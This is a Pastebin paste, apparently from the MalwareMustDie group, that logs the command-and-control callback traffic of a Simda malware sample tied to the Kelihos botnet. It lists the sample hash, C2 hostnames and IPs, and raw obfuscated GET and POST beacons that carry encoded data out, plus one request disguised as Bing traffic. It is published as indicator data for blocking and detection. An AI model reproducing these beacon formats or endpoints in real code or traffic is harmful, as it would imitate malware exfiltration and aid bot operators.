API tools faq
paste
Advertisement
MalwareMustDie

#Simda Payload callbacks Traffic (origin: Kelihos Botnet)

MalwareMustDie
Jan 16th, 2014
1,713
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.85 KB | None | 0 0
raw download clone embed print report
  1. #MalwareMustDie | Thursday January 16 2014 -- 18:06:48 +02:00
  2. # Simda Payload infection from Kelihos Botnet
  3. # CNC CallBack Traffic | To be blocked/mitigated
  4. # Sample MD5: ca3efa7ee61fba5671b31c98ebd00d77
  5. # VT: https://www.virustotal.com/en/file/aebf4290717b65d6e2256a56949307f0c7b12d9cecd73f366432b3cecf152f3f/analysis/1389888198/
  6. # Analyzed by: @unixfreaxjp
  7.  
  8. // first
  9.  
  10. GET /?K17g31=%96%9C%A5%D3%A5%A7_%C4%99q%9E%94%95l%9D%DB%9D%9Fh%94g%9A%A8c%C9%A2%
  11. A6%B1ij%CB%95%94%98%DC%E6%AC%E9%EA%86%B1%5D%AE%CE%95%9Ej%9C%A8jkY%9D%A5%A0%B0%92
  12. %C8%9C%B0%93W%A4%D0%97n%A4%98%A6%B5%AB%ACb%A4%7Bo%97c%A7%7B%9E%A8klew%7Dz%AAe%A5
  13. %B2%A1%90ik%9BhW%E4%CA%E3%AC%A2%A4%5E%91gl%96a%91i%9B%A6gicagi%A3%5E%89%E5%AA%7B
  14. ag%97cb%B5%9A%96%E1%EC%B1a%93%5B HTTP/1.1
  15. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  16. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  17. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  18. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  19.  
  20. (no response)
  21.  
  22. // second
  23.  
  24. POST / HTTP/1.1
  25. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  26. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  27. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  28. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  29. Content-Length: 5262
  30. Content-Type: application/x-www-form-urlencoded
  31.  
  32. C555=%96%C7%A7%A2%D4%DA%90%C4%98%9D%9Cb%C4%9C%A2%AC%9Am%99g%9Dr%D9%94%C5%A3%A0ve
  33. hh%A5%C8%96%E1%D3%EBk%D4%A5o%98h%94j%9D%A8p%98%AA%9Ahk%ACf%99%A1%A6xfen%A3%95%A9
  34. %A2%A9%A9%5E%C0%A6%A6%9Bg%94j%A4%AEkogagk%A4f%99%A0%A6wjlm%A8%95%A1%A7%D3%AB%5E%
  35. C4d%9E%C6%96%95f%9F%A5kp%60%92mr%AA%5B%C5%D5%D0y%98kf%A4%9E%D4%A2%D5%D3%8D%93io%
  36. 9Ae%8Ek%9D%ABdkeglm%A9c%90%A1%9Fyji%94%D1%96%A3%A5%A4%A5c%93jq%9DW%D8%AF%A8%EC%A
  37. D%91%83W%AC%A2%D7k%94%A0%A0vg%5B%A1%E0%CC%AD%D3%D7%A1q%A9%5D%A6%CE%95%9Ek%9E%AB%
  38. 7Drkez%7D%A9%60%95%B5%AFvhih%A4%AB%B6%B0%A9%ABp%A4k~%9De%95n%91%E7%9C%ACpagi%A3%
  39. 5E%96%A0%9Dseef%A2%95%A0%9F%A2%A4%5E%91%5D%AF%A2a%91i%9B%A5h%7ChW%A9%B3%B0a%95%9
  40. 5%DF%A8%A5%A4%A7%E6%A2%C3%DE%D8%E8w%CF%AA%AD%C6%9D%CD_%DE%E4%9D%ADpr%9B%A8%D5%93
  41. %83%B5%D9%A4%A8%9DU%C2%D1%D1%E8%D7%E6N%92hY%A6%94%D5%A2%E1%DA%8FF%3Dr%8B%82%93%5
  42. B%83%B3%D6%A8%A3%A8%A9%E2%D7%DF%D6%E4%D5%9B%CEW%B3%DA%A3%81%7D%D0%DE%A5%AC%A7%92
  43. %A3%A5%D4%A2%CC%DE%DBc%99%9A%A7%92%B8%DF%D5%E6%EB%8F%D3%9CFor%D6%AD%DA%BE%ABY%A9
  44. del%A1f%91%A0zMxx%A1%D7%C6%DE%D4%E4%818%AA%A5%AD%CA%9D%89%8B%94%95~%AB%94%A1%9F%
  45. A2%D6%A1%83%BC%D2%A7%9E%96U%B3%C8%D3%D4%DE%D9%A0%C2%AB%A8%D7Q%A5%AB%D4%EB%9C%AB%
  46. 40%3B%80%A7%E7%93%CF%1D%8D%90%96%A3%96%D9%CA%DD%D4%E0%E8%5B%A6%A5%A0%CE%9F%C6f%B
  47. 4%E3%AB%9E%A5%97%98%9C%D8%3Bm%C6%D6%B1%99%A4%AC%E5%85%B9%DD%E6%D9%A0%CF%9C%AD%85
  48. v%D9%A9%D7%E4%A9%9E%A5QoF%7D%81%CC%D2%D5%A8%A7%9D%9A%DB%D9%E3%E4%E2%D8%8F%D5%9CY
  49. %CB%2D%D3Y%C2%DE%A5%9D%A2%A8%AAY%BC%9C%D7%D4%DF%B1%9A%A9U%B7%DD%E0%DB%E1%E6%93%D
  50. 3Wq%85Y%AC%7B%9D%A9ppiegb%808%B6%D8%D0%AB%9A%A7%9D%D7%CE%E4%E2%E7%E4%92%C2%AB%9E
  51. %85%97%5D%AB%8B%CC%A0%A7%97%A0%AE%AC%93w%D1%E3%D2%B5%A3%9A%A9%92%AA%E8%DF%DE%E3%
  52. A0%C6%A9Y%9DQ%89%84%AD%A7ljcfjj%9C%3Bm%B7%DC%B7%9B%9E%AD%92%CB%6C%E1%92%CB%97%CF
  53. %9B%A8%DC%A4%81%91%BB%95_%84ujmr%A3f%97%98zM~%A3%A9%D7%D1%1E%8F%B3%D7%A2%CA%AD%9
  54. E%92~%C2%A7%CC%DC%9C%A6%98%9F%ABf%C7%93%C6%D7%DB%B2%A1%A4%9C%DB%CA%7Dy%BF%DD%91%
  55. D3%A6%AC%D4%97%D5Y%99%C3%7C%8DSw%A9%9A%E0%93%DA%DE%DF%AEUhc%A7%85%BC%D0%E0%DB%A3
  56. %C2%9E%9E%85%81%C2%9C%D6%95%8A%89dQdY%B7s%B8%7Cw%90%9E%98%A7%E1%D8%DF%D5%E6%94%5
  57. C%AF%7C%8D%85w%D3%9A%D8%DA%AE%A8%A5%9CWl%A1c%83%C2%BDtB%3F%82%DB%C8%E2%DE%E5%E3%
  58. 94%D5W%7C%D4%9E%D1%AB%D0%E8%AA%A2%A2%9FW%7C%DF%97%C8%DD%E1c%85%96%98%DD%85%A1%9D
  59. %A2%94%94%D0%A9Y%BC%9A%CF%9D%DA%EC%AAY%8B%81DC%CA%97%D1%D3%DC%BA%A8U%82%D7%C9%D9
  60. %D0%92%BA%9D%D3%A4%9A%D9Q%92j%8B%E7%AC%A7%A7%9A%A4%9E%808%BA%D8%DB%A7%A4%AC%A8%9
  61. 2%B2%D5%D3%DB%D5N%B1%A3%9A%DE%96%D3Y%9C%A6DC%80%9A%9A%AB%E2%A1%D2%D5%E1c%8A%A8%9
  62. A%E4%92%BD%DE%D6%D9N%A5%A9%A2%DB%96%D3Y%B1%E7%98%A6%98%A8%A6%AB%DEN%A9%D4%CE%B7%
  63. AA%A7%9A%92%B5%D1%D2%DD%94_%8FgFoz%CF%AD%D0%E1_%8B%5CQ%87%8B%C2N%B1%D4%E1%BA%A4%
  64. A7%A0%92%A8%DF%DD%E0%D9%91%D5%A0%A8%D3%A4%81j%9D%A3hgdcei%808%B0%D8%D0%B5%A4%A8%
  65. A4%D8%D9%90%BE%D8%DA%97%C4%9CY%B5%A3%D0%9F%D0%E8%AA%A2%A2%9F%98%A5%93s%C7%D8%E1%
  66. AC%A4%A3U%A4%95%A0%A2%7F~%85%CA%A5%9B%D4%9F%C5Y%BF%C5%84Yw%96%AD%A2%D6%93%83%B3%
  67. DF%AC%AB%9A%A7%7Fo%C7%D8%E0%D8%9D%D8%AAY%A9%96%C7%9E%D9%D9%9C%AB%40%3B%84%A2%D6%
  68. A0%D2%E2%DC%A9%A9Uc%C0%AA%C4%8F%B8%E6%8F%CE%9C%B0%D4%A3%CCY%9E%A3gY%86%96%A9%AF%
  69. DC%91%C8%8F%BD%A4%98%A0U%A4rz%B0%D6%E3%90%C6W%8B%CA%92%C5%9E%DD%95pgg_gF%7D%7B%C
  70. C%D2%DF%B2%A8%A4%9B%E6%85%9E%BD%B7%C8N%A7%A9%9A%D2%96%D8%A8%DD%E0WkaaW%8C%D8%A0%
  71. D9%D8%D0%A8U%85%96%D5%D0%90%A1%7F~%7B%CA%9A%AB%D4%A4%D0%9F%DF%95e%87x%85W%7F%E5%
  72. 8F%D0%D4%E4%B2%A7%A0U%A5%93%A0%8F%C5%D9%A0%D7%A0%9C%CAQ%B1%9A%CE%E0WkS%7D%98%A7%
  73. DA%A3%C4%D6%D2c%85%96%98%DD%85%9D%8F%B6%B9%83nA%86%CE%94%D3%A8%DE%E4%9D%ADS_%85~
  74. %C7N%A9%E1%CE%B0%9A%AC%A4%E4%D0%90%A1%A0%A4N%B4%9C%AB%DB%9A%C4%9E%8B%C5%98%9C%9E
  75. QiY%BF%8F%D1%D6%E2%A4%9C%9AU%C2%C6%D3%DA%92%A1N%A5%7C%8Er%3B%B5%B0%D0%D6%A2%AE%9
  76. CQ%87%A8%EA%93%D5%E3%DC%BCU%9B%A4%E4%85%C7%D8%E0%D8%9D%D8%AAY%BD%81nC%BE%DA%9A%A
  77. E%A5%9A%AB%B2%93%83%D3%D3%CE%B7%9AU%9B%E1%D7%90%BC%DB%D7%A0%D0%AA%A8%CB%A5%81g%B
  78. 9%BA%8BYy%A3%98%A6%D8%A5%D2%E1%D8chcj%92%B8%C0%A0%92%9Cy%A3im%96g%95p%9E%9EDC%7B
  79. %A0%AB%9F%DC%A6%83%D5%DC%B5U%82%9E%D5%D7%DF%E2%E1%DA%A2%81e%87%AA%85%81%7F%DD%D6
  80. %A4%9E%AA%A0%A9%A4%93a%91%A4%8D%96%85fU%9A%B0%B2%A8%A7%A7c%9Albr%3B%A9%A8%DF%DB%
  81. A0%B1S%97%A6%AB%93%7B%CC%D2%DF%B2%A8%A4%9B%E6%85%9E%BD%B7%C8N%A7%A9%9A%D2%96%D8%
  82. A8%DD%E0WlafW%8C%C3_%83%97%B8%85njm%A6%9D%A4%98%7F~%81%D0%AC%A7%C9~%A2%91x%7F%84
  83. %A2%96%A3%A6%AC%E2%94%D7%8F%C3%AC%A8%AA%96%DE%85%B3%9A%9D%94%60%91hi%85Q%D9q%A1%
  84. 95%89%9E%97%9A%AA%AD%E5%97%C5%E4%E1%A4%97%A1%9A%92%92%90%A0%A2%A2%5E%8Fki%97b%9A
  85. Fu%9B%A7%AB%A2%94t%94%C6%A7%D6%E3%D2%B0U%85%A7%E1%C8%D5%E2%E5%D1%3Bk%8A%B2%D8%A5
  86. %C6%A6x%7F%AA%A6%A6%A4e%9E%EB%93py%D0%B6%A7%A8%A8%A0%CA%E8%D4%7F~%A5%CA%A5%A5%D4
  87. %98%D0%A7%99%DA%AF%9E%40%3B%AA%9E%E5%A4%CC%D2%D2%B6c%9A%AD%D7rz%DB%E5%D5%A1%D4e%
  88. 9E%DD%96nC%AF%BB%8A%9E%A5%A7e%9E%EB%93py%E0%B9%98%9D%A4%E5%D9%9E%D4%EA%D9%3Bk%AA
  89. %AF%C8%99%D0%AC%DF%A3%9C%B1%98%3EA%AC%E9%91%CB%DE%E0%B7c%9A%AD%D7rz%E2%E8%D7%96%
  90. D0%AA%AD%93%96%D9%9Ex%7F%9C%B1%A3%9D%A6%AB%D8%A0%91%D4%E5%A8B%3F%A8%E2%D4%DF%DB%
  91. E5%EA%5C%C6%AF%9Er%3B%D4%A6%CC%EDk%A9%A1%A1e%9E%EB%93py%C0%90%96%ADi%A0%CA%E8%D4
  92. %7F~%91%D5%9D%A6%D4%9F%8F%9E%E3%DADC%A5%A6%A5%9D%DF%9A%96%A1%9B%A8%AD%9AB%7C%D8%
  93. E6%D2%DA%E3%A1%D5e%9E%DD%96nC%CC%E9%9A%A1%9E%A4%A9%AF%A1%93%DB%D4zM%81%82%88%A0%
  94. CA%E8%D4%7F~%83%AF%8Ag%CA%A9%C6Fu%D6%A3%A0a%96%AF%9E%808%A9%E1%E7%96%A9%96%A9%D7
  95. %97%DB%9D%D7%EC%93nA%8C%DE%A4%D5%9E%D8%82A%8C%AC%A4%AB%9E%E0%3Bm%C2%E6%B6%A9%9A%
  96. A2%7Fo%C3%E8%E5%E8%93%CEDC%B8%AA%D4%AD%D0%E2DC%AA%9E%A0%A9%E5%A4%D6%D4%9B%A8%AD%
  97. 9AB%7C%B8%E9%E2%E6%D9%9BnA%B2%C6%9F%CA%9C%D3%D6e%9E%AB%96DC%97
  98.  
  99. (no response)
  100.  
  101. // third
  102.  
  103. GET /?ai=kaXUncPZnWOPzqeXm5KXo5bPzGaYY5qi0KilnZrXlpdkj9qh19XX4M3VzaifoczW25vUxdX
  104. Vopp4s7pn08PTvJrCpVzRmsfc1tmtlMWtx5dmmtiXmcaXopObnZzGXpmkpKjTl5atnpVfzq1Y1srJrpO
  105. cnnybZpeysauilqe2mGVinKl4r6KcqKOsnHuaYpekkQ%3D%3D HTTP/1.1
  106. Host: update2.iw2iaeqaih6b.com (65.98.83.117)
  107. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
  108. Connection: Keep-Alive
  109.  
  110. // response:
  111.  
  112. HTTP/1.1 200 OK
  113. Server: nginx
  114. Date: Thu, 16 Jan 2014 08:17:20 GMT
  115. Content-Type: text/html
  116. Transfer-Encoding: chunked
  117. Connection: close
  118. X-Powered-By: PHP/5.3.5
  119.  
  120. 80
  121. 59fbca219566add957ae4ef867779cc87ebb082168e31c102a4e5f709a3cb447a0b2b46c45539e72
  122. 111605b98ce12de3f727ff583bca4746ed2a66b06b5690b3
  123. 0
  124.  
  125. // forth
  126.  
  127. GET /?7w3uOC343=%96%C9%D2%D3%D4%DA%8F%94n%9B%96a%C3%9E%9F%AAo%9Dkbgk%A9%90%93%9F
  128. %9Fj%ACh%A9%B4wY%AB%A9%AF%DC%E6%C7%C2%9A%A3%CA%9Bv%96b%94l%9D%9B%A3%A7%9An%9B%9E
  129. %A0q%AB%95%DA%A0%DBp%A7%82yymk%A6%A8%B4%A5%A4%A6t%A3jl%99d%93%7F%B1%B6nputk~%ABb
  130. %97%A4%93%A9%DC%A6%B2%7Fscdc%A6%98%A0%9F%A2%A4_%91gi%95a%91i%9B%9B%ADvcagi%A3_%A
  131. 6%A4%93%A9%F1p%A8%81g HTTP/1.1
  132. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  133. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  134. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648;
  135. .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  136.  
  137. (no response)
  138.  
  139. // fifth
  140.  
  141. GET /?9m1gM20=%96%97%A2%D0%A7%AC%91%99%9C%9C%C7d%94%9F%A1%AAij%98h%9Ar%ACc%9C%A3
  142. %9F%9E%A6%96%99%B0bV%E9%DB%AD%E6%E8%CC~%87%AC%A2%C9n%92j%9E%A8i_%9F%9F%9Ev%D7%93
  143. %90%B2%B5_%DA%9A%CB%8Adc%A8%AB%A9%A7%A6%B7r%97ik%ABs%94l%9F%A8i%7Fyrnp%B5q%97%B4
  144. %A5m%A1f%8D%BF%97%A3%AF%95%A0%9F%A2%A4%60%91gi%95a%92i%9B%A5gicag_%E9k%93%9F%9Di
  145. %9Db%AA%82X%A2%EC%A2%A3%A1%96 HTTP/1.1
  146. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  147. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  148. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  149. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  150.  
  151. (no response)
  152.  
  153. // sixth
  154.  
  155. GET /?5g5iQ17=%96%9D%D2%D4%D4%D8%94%C5%9D%9D%C8%94%91q%A4%AAj%9D%96gkm%AB%92%97%
  156. D3%D3m%A0%9B%9E%88g%5D%E9%DB%AD%E6%E8%CC~%87%AC%A2%C9n%92j%9E%A8i_%9F%9F%9Ev%D7%
  157. 93%90%B2%B5%5B%D4%9E%CD%8Ecj%A8%AB%A9%A7%A6%B7r%97ik%ABs%94l%9F%A8i%7Fyrnp%B5q%9
  158. 7%B4%A5i%9Bj%8F%C3%96%AA%AF%96%A0%9F%A2%A4_%98gi%95a%92i%9B%A5gicag_%E9k%93%9F%9
  159. De%97f%AC%86W%A9%EC%A2%A3%A1%96 HTTP/1.1
  160. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  161. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  162. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  163. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  164.  
  165. (no response)
  166.  
  167. // seventh
  168.  
  169. GET /?793179316=%96%9B%D3%D4%D4%A8%92%C2ki%9Ae%92%9E%9E%A6%98ri%93kk%AB%5E%96%9F
  170. %CF%9Dmga%99pY%A8%AC%AF%DC%E6%C7%C2%9A%A3%CA%9Bv%96b%94l%9D%9B%A3%A7%9An%9B%9E%A
  171. 0q%AB%95%DA%A0%9Dpcjoyjn%A6%A8%B4%A5%A4%A6t%A3jl%99d%93%7F%B1%B6nputk~%ABb%97%A4
  172. %93%A9%9E%A6nhicaf%A3%9B%A0%9F%A2%A4_%91gi%95a%91i%9B%9B%ADvcagi%A3_%A6%A4%93%A9
  173. %B3pdi%5D HTTP/1.1
  174. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  175. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  176. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  177. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  178.  
  179. (no response)
  180.  
  181. // eighth
  182.  
  183. GET /?1e9317904=%96%95%A0%A3%D4%A7%92%9Ahk%96b%94l%A4%ABlphfp%9E%A5b%C8%A7%9Fd%C
  184. Bl%96%96g_%A7%AA%AF%DC%E6%C7%C2%9A%A3%CA%9Bv%96b%94l%9D%9B%A3%A7%9An%9B%9E%A0q%A
  185. B%95%DA%9A%C9vedm%7Fil%A6%A8%B4%A5%A4%A6t%A3jl%99d%93%7F%B1%B6nputk~%ABb%97%A4%9
  186. 3%A3%CA%ACpagi%60d%A2%99%A0%9F%A2%A4_%91gi%95a%91i%9B%9B%ADvcagi%A3_%A6%A4%93%A3
  187. %DFvfc%5B HTTP/1.1
  188. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  189. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  190. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  191. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  192.  
  193. (no response)
  194.  
  195. // ninth
  196.  
  197. GET /?1e93126=%96%C9%D2%D3%D4%DA%8F%94n%9B%96a%C3%9E%9F%AAo%9Dkbgk%A9%90%93%9F%9
  198. Fd%9Ang%96f%5C%E9%DB%AD%E6%E8%CC~%87%AC%A2%C9n%92j%9E%A8i_%9F%9F%9Ev%D7%93%90%B2
  199. %B5W%D2%A2%97ndi%A8%AB%A9%A7%A6%B7r%97ik%ABs%94l%9F%A8i%7Fyrnp%B5q%97%B4%A5e%99n
  200. Y%A3%97%A9%AF%95%A0%9F%A2%A4%60%97gi%95a%92i%9B%A5gicag_%E9k%93%9F%9Da%95jvfX%A8
  201. %EC%A2%A3%A1%96 HTTP/1.1
  202. Host: report.a79e1a9ku793179s.com (74.82.216.5)
  203. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727;
  204. .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.
  205. 21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  206.  
  207. (no response)
  208.  
  209. [...]
  210.  
  211. GET /chrome/report.html?1uOCE=%9B%EE%EDk%D9%DF%C6%B7T%D8%D8%D1n%A6%80vx%A9%9D%E3
  212. %9C%C9%A6%D2%CC%5B%A6%B7%93%9E%DE%B3%80w%AA%AD%BDg%9A%9D%B1%ABd%95%A1%B3s%A8%82w
  213. x%A9%BD%BDo%99%A0%B0%AAb%A8%A7%A1e%AAu%B5%AA%EA%B4%A7%5E%92%99%9E%99c%93%9F%9Da%
  214. A6%7Fsu%A7%A7%A7%5E%92%8F%E4%A4%5E%93%9F%9Da%A6%92xk%E9%F1%B4a%94%8D HTTP/1.1
  215. Host: www.bing.com (204.79.197.200)
  216. User-Agent: ?M4 (?c; ?I8; ?T; ?N 2.0.50727; ?N 1.1.4322; ?N 3.0.04506.590; ?N 3.
  217. 0.04506.648; ?N 3.5.21022; ?N 3.0.4506.2152; ?N 3.5.30729)
  218. 113320D88452A5583050947D414DFA8D448AC
  219.  
  220. (no response)
  221.  
  222. // and back to previous repitition..
  223.  
  224. ---
  225. #MalwareMustDie
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!